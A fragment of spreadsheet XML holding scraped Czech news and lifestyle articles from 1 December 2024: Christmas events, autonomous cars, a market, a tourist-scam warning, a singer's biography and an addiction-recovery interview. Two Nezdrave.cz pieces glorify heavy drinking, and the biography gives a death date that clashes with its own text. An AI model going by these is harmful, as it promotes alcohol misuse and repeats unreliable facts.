08:51 včera Znojemsko Vánoční Znojmo : Zapojit se do soutěže Vánoční Znojmo mohou také letos obyvatelé města. Soutěží o nejhezčí výzdobu, stromek nebo výlohu. Chcete si na tomto místě přečíst aktuální zprávy z vaší obce a jejího okolí? Stačí si vybrat svou obec</t>
  </si>
  <si>
    <t>8090</t>
  </si>
  <si>
    <t>20241201_139_3476417917_c333d16bc1fa8bdfd270.html</t>
  </si>
  <si>
    <t>c333d16bc1fa8bdfd270</t>
  </si>
  <si>
    <t>Vývoj autonomních vozidel a jejich vliv na budoucnost dopravy</t>
  </si>
  <si>
    <t>Vývoj autonomních vozidel a jejich vliv na budoucnost dopravy Napsal Rudolf Procházka / 1.12.2024 S rychlým pokročením technologií se autonomní vozidla stávají stále více skloňovaným tématem v oblasti dopravy. Tato inovativní vozidla, schopná pohybu bez lidského zásahu, slibují nejen zrychlení a zvýšení efektivity dopravy, ale také zásadní změny v přístupu k bezpečnosti na silnicích. Jaké jsou tedy hlavní výhody a výzvy, které tento fascinující obor přináší? Bezpečnostní přínosy autonomních vozidel Jedním z nejzásadnějších argumentů pro zavedení autonomních vozidel je potenciální snížení počtu dopravních nehod. Podle statistik je přibližně 90 % všech nehod způsobeno lidským faktorem, jako je nepozornost, alkohol nebo unavenost. Autonomní systémy jsou navrženy tak, aby eliminovaly tyto faktory a uplatnily pokročilé algoritmy pro odhadování situace na silnicích. Fascinující je například to, že prvních tisíc kilometrů testů autonomní jízdy bylo zaznamenáno bez jediného incidentu, což naznačuje, že tyto technologie mohou posunout bezpečnost na novou úroveň. Přesto existují i obavy o etické otázky spojené s rozhodováním autonomních vozidel v krizových situacích. Jak by měla vozidla reagovat, pokud by musela volit mezi ochranou pasažérů a záchranou chodců? Tyto otázky otvírají diskuse o zodpovědnosti a byť technologie stále pokročily, právní rámce za nimi pokulhávají. Ekologické aspekty a dopad na městský život Další důležitou skupinou výhod, které autonomní vozidla nabízejí, jsou ekologické aspekty. Efektivnější řízení a optimalizovaný pohyb mohou vést k nižší spotřebě paliva a nižším emisím skleníkových plynů. Autonomní vozidla navíc mají potenciál transformovat městský provoz tím, že umožní sdílené dopravy, kdy více lidí může cestovat ve stejném vozidle, místo aby každý měl vlastní auto. Tento posun by mohl výrazně snížit hustotu dopravy ve městech, což by mělo pozitivní vliv na kvalitu ovzduší a životní pohodu obyvatel. Dopady na městský prostor jsou rovněž fascinující. Eliminací potřeby parkovacích míst, která dnes zaberou významnou část městských ploch, by se mohly uvolnit prostory k výstavbě parků, bytů nebo jiných rekreačních zón. Tím, jak se autonomní vozidla stávají standardem, mohou vzniknout nové modely urbanismu zaměřené na udržitelnost a kvalitu života. Ekonomické aspekty a transformace pracovního trhu Ekonomické důsledky zavedení autonomních vozidel by mohly být rovněž opačné, než by se na první pohled mohlo zdát. Snížení potřeby řidičů v sektoru přepravy by mohlo mít za následek ztrátu pracovních míst zasažených automatizací. Na druhou stranu však vznikne velký potenciál pro nové pracovní pozice ve vývoji technologií, údržbě autonomních systémů či vzdělávání. Tato transformace trhu práce bude vyžadovat přizpůsobení a přeškolení pracovníků ve mnoha oblastech. Budoucnost dopravy tedy vypadá jako směs nadějí a výzev. Jakékoliv přijetí autonomních vozidel si vyžaduje nejen technologický pokrok, ale také umění vyvážit etické, ekologické a ekonomické faktory. Diskuze o autonomních vozidlech se stává stále palčivějším tématem současnosti, a to nejen pro odborníky, ale i pro laickou veřejnost, která čelí změnám, jež mohou zásadním způsobem ovlivnit její každodenní život. Post navigation Autor: Rudolf Procházka Autor person Rudolf Procházka</t>
  </si>
  <si>
    <t>20241201_14_3479332613_7671d4156376949cddca.html</t>
  </si>
  <si>
    <t>7671d4156376949cddca</t>
  </si>
  <si>
    <t>Kdo říká, že whisky je jen pro staré pardály? Osvěžte svůj životní styl tímto nápojem, který vás nadchne</t>
  </si>
  <si>
    <t>Kdo říká, že whisky je jen pro staré pardály? Osvěžte svůj životní styl tímto nápojem, který vás nadchne autor: Redakce Nezdrave.cz | 01.12.2024 | Chlast Whisky, oblíbený nápoj mnoha generací, se stala symbolem nejen elegance a sophistication, ale také udavačem zábavy a adrenalinu. Není to jen o šampaňském na oslavách nebo pivu po práci. Podívat se na whisky s vtipem a neformálností, to je nový trend, který byste měli zařadit do svého repertoáru. Takže, předtím než se posadíte na stoličku ve svém oblíbeném baru, pojďme nahlédnout na to, co všechno whisky může nabídnout a jak ji do svého života zakomponovat, abyste se stali nejen znalcem, ale i králem večírků. Whisky jako trend pro yuppies Důvěřujte mi, whisky už dávno není určena jen pro staříky v županech, kteří se pokoušejí vymáčknout ze života poslední kousek elegance. Dnes je whisky víc než jen nápoj; je to životní styl! V barech se ochutnávají unikátní koktejly a nápoje na bázi whisky, které vás dostanou do varu. Získejte si pozornost svých přátel s drinkem, který nejenže chutná skvěle, ale také vyzařuje šarm a sebedůvěru. Věděli jste například, že whisky se ve Skotsku vyrábí více než 500 let? Ano, po celou tu dobu se vyvíjela, přizpůsobovala a nyní vás vybízí, abyste ji objevovali s neodolatelnou zvědavostí. Pokud si stále myslíte, že whisky je nudná, dvoubodková nuda, pak se musíte podívat do zrcadla a zamyslet se, zda opravdu žijete naplno. V poslední době jsou koktejly na bázi whisky stále častěji prezentovány na Instagramu s hashtagy jako #WhiskyWednesday, #WhiskyLovers a podobně. Dalo by se říct, že whisky se konečně posunula z nudného nápoje pro starou gardu do pozice trendy konceptu pro rytíře dnešní doby. Pokud si chcete užít nějakou zábavu a přitom nesklouznout do trapné situace, je whisky vaší novou zbraní. Whisky a jakožto umělecká forma Nezůstávejte na povrchu. Whisky se dá vnímat jako víc než jen silný alkohol . Je to umění, vášeň a tradice. Různé značky nabízejí širokou škálu chutí a aromatických profilů, které dokážou vzbudit váš smysl pro objevování. Sklenička neboli „dram“ se může měnit v závislosti na celé řadě faktorů. Způsob míchání, věk, sud, a dokonce i oblast, ze které pochází. To všechno rozhoduje o výsledném symfonickém zážitku. Pokud máte minutu, zkuste si představit sklenici, která představuje váš osobní příběh – v čem jste vychovali vlastní styl? Pokud se cítíte jako ještě větší rebel, zkuste whisky namíchat s nezvyklými ingrediencemi, jako je rozmarýn nebo jalovec. To může vypadat jako zbytečné kaskadérské číslo, ale každá ingredience má svůj vlastní příběh. Spojení chutí je jako vzrušující diskuse s kamarádem; čím víc se do toho ponoříte, tím více objevíte. Mějte na paměti, že alkohol je jako každé dobré umění, i on rád škádlí naše smysly a vyzývá nás k novým zkušenostem. Takže si nalijte doušek, nechte se unést a klidně si se svými přáteli vytvořte svůj vlastní slavný whisky koktejl. Tohle je výzva nejen pro ty, kteří už mají „whisky klobouk“ na hlavě, ale také pro nováčky, kteří chtějí tuto tradiční nápojovou kulturu vnímat krapet jinak. Uvidíte, že si zavzpomínáte na chvilky, kdy jste se smáli a sdíleli příběhy, zatímco se na stole na šampaňsku rozlévaly whisky. Tak se připravte na večer plný chyba chutí, které vás budou hřát, jako byste se zahalili do venerabilního pláště. Nezapomeňte, chlastání je umění a umění by vám mělo pít s nadhledem. Vytvořte si svou vlastní whisky legendu a nezapomeňte ji sdílet s přáteli. To je život, tak si ho užijte na plné pecky! Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241201_140_3476442599_738eb613505d35f0f899.html</t>
  </si>
  <si>
    <t>738eb613505d35f0f899</t>
  </si>
  <si>
    <t>Nejbližší trh na Kubáni 3. a 5. prosince</t>
  </si>
  <si>
    <t>Nejbližší trh na Kubáni 3. a 5. prosince S přicházející zimou se tenčí nabídka zeleniny, proto stánek Zelenina Malých bude jezdit do konce prosince už jenom v sobotu. V úterý na trhu bude Grill servis s nabídkou uzenin. Pekařství Kejval nabídne řemeslné chleby a na zahřátí si můžete dát indické občerstvení i kávu u Kafe Majada. Ve čtvrtek jezdí uzenářství Řeřicha s nabídkou čerstvého hovězího a vepřového masa, skvělých uzenin. Také přijede Zahradnictví Macháček s vánočními ozdobami. At the market, you will find the stands of the following sellers: MASO, UZENINY Krůtí farma Brniště - út, sobota - čerstvé drůbeží maso a uzeniny Řeznictví Koloděje - út - uzeniny, hovězí a vepřové maso Řeznictví Chomutov - čt, sobota - kvalitní domácí uzeniny, vepřové a hovězí maso MLÉKO, SÝRY, VEJCE Zelenina Malých od 26. 11. pouze soboty - podzimní zelenina, brambory, dýně... Zelenina Kloubských út, čt, sobota - podzimní zelenina, brambory, zelí... PEKÁRNA, CUKRÁRNA NOVINKA _ Pekárna Kejval - út, čt, sobota - podmáslový chléb, bagety, sladké pečivo Delikatesy Vinařství Mikulica - vína z Moravy OBČERSTVENÍ Rybí gril u Pepy - grilovaný candát, kapří hranolky, uzené ryby, rybí karbanátky Indické občerstvení - út, čt - indické speciality Café Majada - úterý, čtvrtek, sobota - káva z Brazílie : capuccino, espresso, latté od baristy Ukrajinské pelmeně - pelmeně z různou náplní Květinářství Zahradnictví Semela - podzimní čerstvé květiny, věnce, sazenice jahod Řemesla Zahradnictví Macháček - adventní věnce, vánoční ozdoby Upcoming events Would you like to subscribe to our newsletter? Follow us on social media Heřmaňák Náplavka Kubáň Autor: Blanka Rubrika transition_slide Uncategorized</t>
  </si>
  <si>
    <t>20241201_141_3476419322_fc79d58b26dba8eb6bf2.html</t>
  </si>
  <si>
    <t>fc79d58b26dba8eb6bf2</t>
  </si>
  <si>
    <t>Pozor na podvodníky, co si hrají na ztracené turisty! Toto dělají</t>
  </si>
  <si>
    <t>Pozor na podvodníky, co si hrají na ztracené turisty! Toto dělají close Prostock-studio / Shutterstock Blanka Rostovská 1. 12. 2024 clock 3 minuty Na oblíbeném španělském ostrově Tenerife a dalších začali řádit podvodníci, kteří ve velkém okrádají důvěřivé turisty. V jejich síti skončilo už i několik Čechů. Policii se podařilo rozprášit gang zlodějů, který obral asi 1800 lidí o více než 100 milionů korun. V oblíbených španělských turistických destinacích Tenerife a Benidorm se rozmohl podvod, který cílí na nic netušící návštěvníky. Pachatelé, kteří se vydávají za ztracené turisty, oslovují jednotlivce a žádají je, aby jim zavolali z mobilního telefonu. Po předání přístroje s ním podvodníci utečou a oběť zůstane bez mobilu. Scénář zlodějů na Veronicas Strip close zoom_in Veronicas Strip je proslulá nočním životem Nová zlodějská praktika byla zaznamenána zejména na ostrově Tenerife , v oblasti Playa de las Américas na Veronicas Strip, která je proslulá rušným nočním životem. Na problém upozornil uživatel TikToku známý jako @seb_tenerife, který zdůraznil, že k incidentům často dochází, když jsou turisté roztržití, zejména po konzumaci alkoholu . Návštěvníkům doporučil, aby zůstali ostražití a v přeplněných prostorách si hlídali své věci. video Podobné podvody v Benidormu Podobný způsob jednání byl zaznamenán i v Benidormu , kde podvodníci chodí s otevřenou mapou a předstírají, že se ztratili a potřebují najít cestu. Zatímco důvěřivá oběť vysvětluje na mapě cestu, komplicové ji nenápadně okradou. Policie zasahuje proti podvodníkům Úřady proti těmto podvodným aktivitám zakročily. Na Tenerife například národní policie rozbila zločineckou organizaci, která podváděla starší zahraniční turisty. Skupina nabízela turistům technologická zařízení za nízké ceny, a poté, co lidé opustili ostrov, provedla podvodné platby pomocí jejich kreditních karet prostřednictvím sítě obchodů na jihu Tenerife . Operace vedla k zatčení 33 osob a identifikaci více než 1 800 obětí z různých zemí včetně České republiky , které zloději odhadem připravili o více než 4 miliony eur (přes 100 milionů korun). Jak se chránit před podvody Turisté by měli být opatrní a řídit se několika zásadami: Vyhněte se půjčování osobních zařízení Zdvořile odmítejte žádosti cizích osob o zapůjčení mobilního telefonu nebo jiného osobního zařízení. Zůstaňte ostražití v přeplněných oblastech Buďte obzvláště pozorní na rušných turistických místech, zejména v nočních hodinách nebo v oblastech známých nočním životem. Zabezpečte si osobní věci Cennosti, jako jsou peněženky, telefony a pasy, ukládejte na bezpečná a těžko přístupná místa, abyste zabránili kapesním krádežím. Buďte nedůvěřiví k nevyžádaným nabídkám Buďte obezřetní, pokud vás někdo cizí osloví s nevyžádané nabídkou nebo nabídkou, která se zdá být příliš dobrá na to, aby byla poctivá; může se jednat o zástěrky podvodníků.</t>
  </si>
  <si>
    <t>309980</t>
  </si>
  <si>
    <t>20241201_142_3476374260_b16fb29a9a26e72613da.html</t>
  </si>
  <si>
    <t>b16fb29a9a26e72613da</t>
  </si>
  <si>
    <t>Milostné zvraty Ivety Bartošové: Hrušínský milencem, Macura jako spasitel a&amp;nbsp;Rychtář, co ji ovládal</t>
  </si>
  <si>
    <t>Milostné zvraty Ivety Bartošové : Hrušínský milencem, Macura jako spasitel a&amp;nbsp;Rychtář, co ji ovládal Milostné zvraty Ivety Bartošové : Hrušínský milencem, Macura jako spasitel a Rychtář, co ji ovládal Život oblíbené zpěvačky Ivety Bartošové vyhasl předčasně přesně před deseti lety. Byla krásná a o muže rozhodně neměla nouzi. S některým prožila jen pár chvil, s jinými i podstatnou část svého života. Vůbec první velkou láskou Ivety Bartošové nebyl nikdo jiný než pohledný Petr Sepéši , přičemž k seznámení došlo v roce 1983 během soutěže Mladá píseň. Dodnes se říká, že s ním zpěvačka zažila „své poprvé“. Věrnost mu ale nic neříkala, a Bartošová si ve svém knize stěžovala, že si k nim domů vodil i milenky . Sepéšiho život nakonec vyhasl předčasně v roce 1985, když zahynul v autě na železničním přejezdu. Půvabná zpěvačka měla pro blonďáky slabost i v dalším letech, tentokrát šlo o Michala Penka . „Chodili jsme spolu sedm měsíců, z toho čtyř u nás bydlela,“ popsal Penk v pořadu 7 pádů Honzy Dědka . Jejich lásku nakonec zničila Penkova žárlivost. Rozvádět se nechtěl Hodně zásadní byl pro její kariéru vztah s hudebním skladatelem Ladislavem Štaidlem , po jehož boku byla dlouhých třináct let. Společně i založili rodinu a Bartošová mu porodila své jediné dítě, syna Artura . Štaidl byl bych jejich poměru ženatý s jinou ženou. Během natáčení filmu Svatba upírů se Bartošová zakoukala do herce Rudolfa Hrušínského nejmladšího a měli spolu prožít románek . Od roku 2002 pak prožívala milostné chvíle se sympatickým hercem Karolem Csinem, vše mělo skončit kvůli zpěvaččině žárlivosti. Začal ji ovládat alkohol O rok později působila spokojeně po boku designéra Daniela Bartáka , jenže po pár měsících přišel rozchod, Bartošová se zhroutila a svěřila se do rukou lékařů . Problémem byla znovu její žárlivost. V letech 2004-2006 byla partnerkou moderátorka Zdeňka Podhůrského . Problémem ale bylo, že se stále stýkal se svou exmanželkou Markétou, což se Bartošové pochopitelně nelíbilo. Jejich vztah tak byl plný rozcházení a scházení, hádek a usmiřování. Rozešli se definitivně po společné dohodě. Ivetin vřelý vztah k alkoholu poté neustál veterinář Roman Hanke, se kterým se seznámila díky své psí slečně Gejše. Bartošová po jeho boku zářila, ale zároveň hodně pila, vše vyvrcholilo tím, že si sáhla na život a skončila tak v protialkoholní léčebně. Hanke vztah poté ukončil. Láska postupně vyprchala V roce 2008 se Bartošové splnil její velký sen, protože se poprvé v životě stala vdanou paní. S manželem, hercem a producentem Jiřím Pomeje to ale brzy přestalo klapat , a o dva roky později se rozvedli. V roce 2011 se snažil zpěvačku zachránit italský šlechtic Domenico Martucci. Vzal ji dokonce do svého díla v Itálii a myslel si, že ji naučí milovat život i bez alkoholu . Jenže jakmile se zpěvačka vrátila domů, byla znovu na dně. Láska skončila. O krásnou zpěvačku dlouho bojoval její fanatický fanoušek Zdeněk Macura , který se tak trochu pasoval do role spasitele . Když Bartošová žila s Josefem Rychtářem, všude vykládal, že se stala obětí domácího násilí. Vše se vyhrotilo v roce 2013, kdy zpěvačku, údajně na vlastní žádost, odvezl do Itálie . Tehdy z toho byl pořádný poprask, který zaměstnal českou policii, italskou policii, a ještě k tomu Interpol . Macura ji nakonec předal rodině Domenica Martucciho, nicméně později si pro ni přijel Rychtář a odvezl ji zpět domů do Prahy . Úplně ji ovládal Majitel bezpečnostní agentury Josef Rychtář byl v každém případě jejím posledním oficiálním partnerem. Myslel to s Bartošovou tak vážně, že se dokonce rozvedl se svou manželkou a v roce 2013 si zpěvačku vzal za ženu. Jenže jejich manželství nebylo pro Ivetu vůbec šťastné. Povídalo se, že Rychtář svou ženu ovládá a ona se tak trápí. V té době také vyšlo najevo, že brala silné léky, všude po domě skrývala alkohol , navíc byla i všemožně pomlácená. Jen po půl roce manželství pak Iveta Bartošová 29. dubna 2004 dobrovolně ukončila svůj život. Předčasně tak vyhasl život talentované zpěvačky, kterou si národ zamiloval. Smutný to příběh. Zdroje: zeny.iprima.cz , super.cz , blesk.cz , extra.cz</t>
  </si>
  <si>
    <t>20241201_143_3476372229_f5163fbe2e3dc053d215.html</t>
  </si>
  <si>
    <t>f5163fbe2e3dc053d215</t>
  </si>
  <si>
    <t>Zuzka byla závislá na pervitinu. Po léčbě začala s cyklistikou a dnes má na kontě světové rekordy</t>
  </si>
  <si>
    <t>Zuzka byla závislá na pervitinu. Po léčbě začala s cyklistikou a dnes má na kontě světové rekordy Šestatřicetiletá Zuzana Rychnovská je rodačka z Třince , patnáct let žila v Brně a dnes už šestým rokem bydlí v Nemojanech nedaleko Vyškova . Když jí bylo třináct, začala mít problémy s alkoholem , experimentovala s drogami a v patnácti letech se stala závislou na pervitinu. Se svou závislostí se dokázala vypořádat a dostala se k cyklistice. Do ní se podle svých slov zamilovala a na posledních dvou světových šampionátech dokázala zajet světové rekordy. „Nebyla jsem schopná přemýšlet nad ničím jiným, usínala jsem s myšlenkami na to, kde ty drogy seženu a s tou myšlenkou jsem se taky probouzela“ Jaké byly vaše první zkušenosti s drogami? Začalo to vlastně už v mých třinácti letech, kdy jsem začala chodit kalit, takže jsem měla problémy s alkoholem , od patnácti už se mi do života začaly míchat i drogy. Začínalo to trávou, přidaly se lysohlávky nebo LSD, ale postupně jsem se dostala taky k pervitinu. Právě na něm jsem se stala závislou. Jak byste popsala dno, na které jste se během závislosti na pervitinu dostala? Dno pro mě bylo ta hrozná nesvoboda. Když jsem byla závislá, přemýšlela jsem jen a jen nad drogami. Nebyla jsem schopná přemýšlet nad ničím jiným, usínala jsem s myšlenkami na to, kde ty drogy seženu a s tou myšlenkou jsem se taky probouzela. To bylo to nejhlubší dno. Se závislostí jsem bojovala sedm let do mých dvaadvaceti, kdy jsem šla do léčby. Jaký byl důvod toho, že jste se šla léčit? Jedním z důvodů, proč jsem se ve dvaadvaceti rozhodla přestat, byl fakt, že mi málem museli amputovat ruku. Na ruce jsem měla absces a doktor mi tehdy říkal, že kdybych přijela o den později, tak by mi tu ruku museli amputovat. Právě když jsem byla v nemocnici kvůli ruce, byly to dny, kdy jsem byla chvilku čistá a uvědomila jsem si, že bych s tím něco chtěla dělat. Do půl roku jsem se dostala do léčby. Tam pro mě byl hodně silný moment, který nastal po týdnu na detoxu. Vyšla jsem ven, měla jsem čistou hlavu a dostavil se obrosvký pocit svobody. Tehdy jsem si říkala, že tenhle pocit svobody už si fakt chci nechat až do konce života, že už o něj nechci přijít. A povedlo se. Už patnáct let nepiju, neberu drogy a deset let ani nekouřím. Přišla někdy slabá chvilka? Slabé chvilky určitě byly. Kvůli drogové kariéře jsem měla jen základní vzdělání, protože jsem nebyla schopná si dodělat jakoukoliv školu. A když jsem přijela do Brna , dodělala jsem si střední školu a hlásila jsem se výšku. Začala jsem pracovat ve společnosti Podané ruce, která pomáhá lidem osvobodit se od závislosti, což pro mě znamená to, že se i díky své práci umím „ošetřit“. Krize přišly, jedna po nějakých šesti letech abstinence, ale nic, co by se nedalo zvládnout. Co vám pomáhalo si znovu nedat? Drogy jsem měla vždycky vyřešené. O nich jsem věděla, že je nechci, ale neměla jsem úplně vyřešený alkohol . Hodně mi pomáhalo si říct, že to není napořád. Fungovalo mi říct si, že třeba rok nebudu pít a pak si to zhodnotím. Vždycky jsem si to pak prodloužila. No a teď prostě nepiju a je to přirozené. Pomáhalo mi aktivní trávení volného času, sportování, čtení, procházky, vzdělávání a prostě žít aktivně. Vzájemně se taky podporujeme s manželem, kterého jsem potkala v léčbě a který má stejnou minulost jako já. Zobrazit příspěvek na Instagramu Příspěvek sdílený Zuzana Rychnovská (@zuzanarychnovska) „Zrodila se u mě obrovská vášeň k té směsi rychlosti, adrenalinu a svobody“ Jak se zrodila cesta k cyklistice? Ta začala tím, že se nám narodilo dítě. Nabrala jsem a řešila, jaký sport budu dělat. Začala jsem běhat, později jsem se dostala k triatlonu, což mi nešlo, protože nejsem dobrá běžkyně ani plavkyně, ale nejvíc mě na tom bavilo právě to kolo. Když se mi narodilo druhé dítě, dostala jsem od manžela na dvaatřicáté narozeniny dárek, že jsem si mohla vyzkoušet lekci dráhové cyklistiky u Tomáše Bábka a Robina Wagnera na brněnském velodromu. Šla jste? Jasně. To bylo rok 2020 a zrodila se u mě obrovská vášeň k té směsi rychlosti, adrenalinu a svobody. Nechci, aby to znělo jako nějaké klišé, zkrátka to bylo hrozně dobrý. Proběhly mnou pěkné pocity a do cyklistiky jsem se zamilovala. Jaké byly začátky? Těžké. Jezdila jsem jenom s klukama a byla jsem pořád poslední, nezvládala jsem s nimi dojet ani patnáctiminutové rozjíždění a trochu mě to štvalo, takže jsem přišla za Jirkou Janouškem, který mě začal trénovat a já za rok udělala neuvěřitelný skok ve fyzičce a zlepšila jsem se. Kdy jste začala pociťovat, že jste se zlepšila a mohla byste v cyklistice něčeho dosáhnout? Jednu sobotu ráno v roce 2021 se mi ozval Tomáš Bábek s tím, že se jede mistrovství České republiky a jestli bych českým profesionálkám, reprezentantkám, nechtěla jít rozjíždět team sprint. Přijala jsem to a tam se to začalo lámat. Nedopadla jsem tam úplně špatně a vznikl tam nápad, že bych možná ještě mohla zkusit profesionální cyklistiku. Začala jsem trénovat se sprintery z brněnské Dukly , od té doby mě trénuje Petr Klimeš . Právě díky němu přišly mé pozdější úspěchy. Na závodech v Polsku zase nebyl výsledek úplně špatný, pak bylo GP Brno , kde jsem dojela velmi podobně jako některé mladé české profesionálky. Je řeč o profesionální cyklistice. Nechodila jste do práce? Byla jsem v té době na mateřské a trénovala jsem pořád dál, ale už jsme se nebavili o tom, jestli je můj cíl stát se profesionálkou. V srpnu 2022 jsem si řekla, že už musím jít do práce, takže jsme se domluvili, že si budu stanovovat reálné cíle, protože i kdybych do cyklistiky investovala všechen svůj čas, tak bych se nejspíš nikdy nedostala mezi úplnou světovou špičku. Přesto jste se ale dostala na mistrovství světa. Letos jsem byla ve Francii , závodila jsem v kategorii Masters. Každá věková kategorie má svou kategorii, například junioři, U23, Elite a Masters , což je kategorie od 35 let výš. Masters už jsou takoví cyklističtí důchodci, mezi kterými ale často závodí právě bývalí profesionálové. Kdy jste byla tedy poprvé na mistrovství světa? Poprvé jsem na mistrovstsví světa v dráhové cyklistice v kategorii Masters závodila loni v Manchesteru . Tam to bylo naprosto skvělé, odvezla jsem si dva tituly mistra světa, a to v závodu na 500 metrů s pevným startem a ve sprintu. To jsem zajela dokonce světový rekord ve své kategorii od 35 do 39 let. Tehdy se dalšími mistry světa v team sprintu stali David Gotthard, Petr Malášek a Petr Neuvirt. A jak pro vás dopadlo letošní mistrovství ve Francii ? Zase jsem získala dva tituly ve sprintu a v závodu na 500 metrů s pevným startem. Ve sprintu jsem zase zajela světový rekord, takže jsem to zase o kousek posunula a tím pádem jsem zajela i svůj osobní rekord. Navíc se dařilo i české dráhové sestavě obecně, protože mistry světa v team sprintu se za rok 2024 stali Pavel Vitouš , Denis Špička , Marek Volf a Tomas Mužík , vicemistrem se stal Pavel Vitouš a bronz vybojovala Andrea Doležalová. Plynou pro vás z takových úspěchů nějaké finanční prémie? Vůbec. U mě je to o tom, jestli seženu nějaké sponzory. Loni i letos jsem sehnala. Zobrazit příspěvek na Instagramu Příspěvek sdílený Zuzana Rychnovská (@zuzanarychnovska) Příští mety? Zajet další rekord a dodělat si výšku Jaké jsou vaše další mety? Příští rok se jede zase ve Francii a v roce 2026 v Londýně , kde bych určitě chtěla závodit. Přála bych si zajet světový rekord na 500 metrů, k čemuž mi chybí dvě desetiny. A životní cíle? Dodělat si výšku se zaměřením na sociální práci. Teď pracuju v Podaných rukou na pozici peer konzultanta a jako sociální pracovník, takže díky svým zkušenostem pomáhám lidem ohrožených závislostmi. Autor: external Rubrika transition_slide Zprávy &amp;gt; Společnost</t>
  </si>
  <si>
    <t>28560</t>
  </si>
  <si>
    <t>34370</t>
  </si>
  <si>
    <t>20241201_144_3476374570_19c9633b724590dc233a.html</t>
  </si>
  <si>
    <t>19c9633b724590dc233a</t>
  </si>
  <si>
    <t>Jak se alkohol stal moderním elixírem mladosti a úspěchu</t>
  </si>
  <si>
    <t>Jak se alkohol stal moderním elixírem mladosti a úspěchu autor: Redakce Nezdrave.cz | 01.12.2024 | Chlast Alkohol . Dávný spojenec, který se v našich životech usadil jako neodmyslitelný prvek víkendové euforie a pracovní agility. Pro většinu z nás už nejde jen o nápoj, ale o styl života, rituál a především nezbytnou ingredienci pro budování těch správných sociálních vazeb. V dnešní uspěchané době se chlast stal jakýmsi elixírem, který slibuje nejen únik od reality, ale také výhodu v tvrdé bitvě mezi jednáními a meetingy. Avšak co se skrývá za touto opojenou fasádou? Pohádka o vínech a koktejlech pro moderní hrdiny Zahajme naše vyprávění u pohádkového vína , které se poprvé objevilo na stolech před více než deseti tisíci lety. V dnešní době se však víno nestalo pouze symbolem kultury, ale především módním doplňkem. Kdo by odmítl sklenku Sauvignonu při večerním poslechu elektronické hudby nebo ochutnávce nového burgeru v trendy restauraci? Mladí yuppies ho doplňují vibrujícími koktejly a snaží se o soutěž v kreativitě. A teď si představte, že existuje koktejl, který obsahuje přísady ze skutečně neobvyklých zdrojů – například z fermentovaných hmyzu. Ano, slyšíte správně! Není divu, že chlast podniká neustálou revoluci, aby držel krok s ekologickým trendem. Ale pozor, nenechte se zmást – něco takového by se mohlo zdát absurdní, přesto se to pomalu stává realitou moderních barů. Mladí lidé se už nebojí experimentovat a hledat nenaplněné chuťové kombinace, které osvěží staré tradice. Tak se zbytečně neostýchejte a klidně si objednejte ten drink, kterému nikdo neporozumí. Je to součást cesty k vašemu „carpe diem!“ Alkohol jako socializační superhrdina Chlast má tu moc, že nejen vzbuzuje zábavu, ale zároveň pomáhá prolomit ledy v nových společenských situacích. Stejně jako je víno pomyslným klíčem k otevírání duší, alkohol poskytuje lidem příležitost uvolnit se a projevit svou pravou osobnost. Ať už se jedná o sklenku piva na uzavřené večeři se starými přáteli, nebo o šampaňské na bujaré oslavě úspěchu, v těchto chvílích se otevřenost stává tím největším pokladem. Dokonce i přechod od studeného pohledu obchodního partnera k srdečnému smíchu a opakovaným přípitkům se zdá být podstatně snadnější s trochou alkoholu v těle. Ale nezapomeňte – je důležité dbát na míru! Nikdo nechce skončit jako ruinovaný karikatura, o které by se později vyprávěly anekdoty u krbu. Rozhodně se vyhněte scénářům, kdy nešťastné finále večera končí nechtěným výkonem karaoke. Jak se říká, štěstí si můžete koupit, pálení žáhy už ale tak snadné není. Ale ruku na srdce – říkejte si, co chcete, bez špetky veselí je život nudný. A co si budeme povídat, pár skleniček v dobré společnosti může být tou nejlepší terapií na světě. Tak si užijte to, co jste právě otevřeli, a nezapomeňte – chlast je zde, abyste ho vychutnávali, a to je ta pravá výhra. Nezapomeňte pít s rozmyslem, protože kdo ví, jestli už vaše sklenička není plná nových příběhů? Nejnovější příspěvky Autor: Redakce Nezdrave.cz Rubrika transition_slide Chlast</t>
  </si>
  <si>
    <t>20241201_145_3476420607_5c4fa75a4321e159149f.html</t>
  </si>
  <si>
    <t>5c4fa75a4321e159149f</t>
  </si>
  <si>
    <t>V Suchomastech rozsvítili vánoční strom. Cukroví bylo zdarma</t>
  </si>
  <si>
    <t>V Suchomastech rozsvítili vánoční strom. Cukroví bylo zdarma „Toník Veselý zahrál bez jediné chybičky vánoční koledy a písníčky od Beatles , i když měl zkřehlé ruce," pochválil žáka Daniel Kratochvíl, který měl na starosti ozvučení a sám hraje v kapele Skupina Akce. Na kytaru skvěle zahrála i Kamila Smolíková. Poté se u mikrofonu střídaly děti, jež zpívaly koledy. Někdy zpívaly samy, jindy si s sebou vzaly na pomoc rodiče. U mikrofonu pomohl své dceři i starosta Bykoše Jan Pužík, který si s rodinou rovněž přišel užít zdejší vánoční atmosféru. V Suchomastech rozsvítili vánoční strom. | Video: Jana Hájíčková Obecní úřad Suchomasty, poskytovatel sociálních služeb Koniklec Suchomasty a návštěvníci akce připravili občerstvení, jež se podávalo zdarma. Nechybělo vánoční cukroví, vánočky, dezerty, čaj nebo svařené víno . „Dobrovolné příspěvky návštěvníků budou použity pro nákup sladkostí pro děti z mateřské školy," vysvětlila starostka Suchomast Iva Kinclová. Návštěvníkům byly k dispozici i stánky od regionálních výrobců, kde si mohli zakoupit bižuterii, vánoční svícny či výrobky klientů poskytovatele sociálních služeb Koniklec Suchomasty, a tak přispět na jejich zájmovou činnost a nákup materiálu pro příští rok. Autor: Jana Hájíčková Autor person Jana Hájičková</t>
  </si>
  <si>
    <t>8260</t>
  </si>
  <si>
    <t>20241201_146_3476341405_b32b2d1c19b8b7ee9edc.html</t>
  </si>
  <si>
    <t>b32b2d1c19b8b7ee9edc</t>
  </si>
  <si>
    <t>FOTO: Vánoční trh lákal do Malečova. Přišel i Mikuláš, anděl a čert</t>
  </si>
  <si>
    <t>FOTO: Vánoční trh lákal do Malečova. Přišel i Mikuláš , anděl a čert Domácí vaječný likér, cukroví nebo čerstvě upečený chleba, to vše vonělo mezi stánky. Kdo hledal něco na zahřátí, mohl si dát svařené víno , horký jablečný mošt nebo i polévku. Ve stáncích bylo možné zakoupit řadu ručně vyráběného zboží. Pro děti byl od čerta, Mikuláše a anděla připraven za krátkou básničku pytlík s dobrotami, a pak pohádka, kterou hrálo Divadlo Krabice Teplice. Autor: Adéla Stejskalová Autor person Adéla Stejskalová</t>
  </si>
  <si>
    <t>10880</t>
  </si>
  <si>
    <t>20241201_147_3476324749_0d7df628bd61fa3153f2.html</t>
  </si>
